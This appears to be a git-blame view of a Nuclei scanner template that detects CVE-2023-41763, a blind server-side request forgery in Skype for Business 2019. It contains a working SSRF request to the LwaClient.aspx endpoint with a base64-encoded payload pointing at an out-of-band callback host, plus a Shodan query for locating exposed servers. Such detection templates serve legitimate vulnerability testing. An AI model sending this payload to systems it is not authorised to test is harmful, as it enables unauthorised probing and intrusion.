2023-12-19 14:24:59 +00:00
|
|
|
id: CVE-2023-41763
|
2023-07-19 16:55:04 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
|
|
|
|
author: hateshape
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
|
|
|
|
reference:
|
|
|
|
- https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
|
2023-12-19 14:24:59 +00:00
|
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41763
|
2023-07-19 16:55:04 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
shodan-query: html:"Skype for Business"
|
2023-12-19 14:24:59 +00:00
|
|
|
tags: cve,cve2023,skype,blind-ssrf,oast,ssrf
|
2023-07-19 16:55:04 +00:00
|
|
|
variables:
|
|
|
|
ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
|
|
words:
|
|
|
|
- "dns"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'Skype'
|
2023-12-20 07:23:37 +00:00
|
|
|
# digest: 490a00463044022052fae6df0e2b357b95c8bdca1a9d0a0099a80095ce32b6a4d362d6b816cb53790220470524a3fd320173bed915e6bc6438af6a3949ecb09986cd30283c5ccaf229ac:922c64590222798bb761d5b6d8e72950
|